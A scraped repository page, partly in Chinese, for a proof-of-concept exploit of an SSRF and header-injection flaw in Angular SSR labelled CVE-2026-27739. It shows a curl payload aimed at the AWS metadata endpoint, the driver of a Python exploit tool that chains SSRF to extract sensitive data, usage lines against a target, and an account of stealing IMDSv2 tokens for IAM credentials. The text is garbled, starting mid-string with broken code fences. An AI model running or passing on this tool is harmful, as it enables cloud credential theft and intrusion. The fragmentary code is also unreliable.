bankerke/-CVE-2026-27739-poc

# CVE-2026-27739-poc curl -H "X-Forwarded-For: http://169.254.169.254/latest/meta-data/" {self.target} ### 2. 通过原型链污染进行 Header 注入 (CVSS: 7.5) **描述**: Angular SSR 处理不安全的查询参数，影响原型链 **影响**: 请求头篡改，潜在的 SSRF 链式攻击 ## 修复建议 1. 移除/禁用 X-Forwarded-* 请求头处理或对已知代理进行白名单限制 2. 在易受 SSRF 攻击的操作前执行严格的 URL 验证 3. 使用 `express-validator` 或类似工具进行请求头清洗 4. 禁用 AWS/GCP 元数据端点或使用配置了跳数限制的 IMDSv2 """ print(report) with open("angular_ssr_exploit_report.txt", "w") as f: f.write(report) def main(): parser = argparse.ArgumentParser(description="Angular SSR SSRF & Header Injection Exploit") parser.add_argument("target", help="Target Angular SSR application URL") parser.add_argument("--no-ssl-verify", action="store_true", help="Disable SSL verification") ``` args = parser.parse_args() exploit = AngularSSRExploit(args.target, ssl_verify=not args.no_ssl_verify) print(f"[+] Targeting: {args.target}") print(f"[+] SSL Verify: {'Disabled' if args.no_ssl_verify else 'Enabled'}") # 执行漏洞利用链 exploit.test_header_injection() exploit.exploit_ssrf_chain() exploit.extract_sensitive_data() exploit.generate_report() ``` if __name__ == "__main__": main() 用法 bash # 基础 SSRF 测试 python3 angular_ssr_exploit.py https://target.com # 跳过自签名证书的 SSL 验证 python3 angular_ssr_exploit.py https://target.com --no-ssl-verify 工作原理 Header 注入测试: 发送原型链污染 payload 以及 Angular SSR 可能不安全处理的不安全转发请求头 SSRF 链式攻击: 通过 X-Forwarded-For/X-Original-URL 测试对 AWS IMDS、GCP 元数据和本地服务的访问 IMDSv2 Token 提取: 将 SSRF 链接起来以窃取 AWS 元数据 token，进而获取 IAM 凭证 自动化报告: 生成包含 CVSS 评分和 PoC 的渗透测试报告 技术细节 根本原因: Angular Universal SSR 应用通常直接将 req.headers 转发给内部 API 而未进行清洗: javascript // 易受攻击的 Angular SSR 模式 app.get('*', (req, res) => { const url = req.headers['x-original-url'] || req.originalUrl; // SSRF internalFetch(url, { headers: req.headers }); // Header injection });

标签：Angular SSR, AWS IMDSv2, CISA项目, CVE-2026-27739, CVSS 7.5, Express安全, Header Injection, HTTP头注入, IP 地址批量处理, PoC, Python, SSRF, StruQ, X-Forwarded-For, 元数据窃取, 原型污染, 反向代理, 无后门, 暴力破解, 服务端请求伪造, 逆向工具, 防御绕过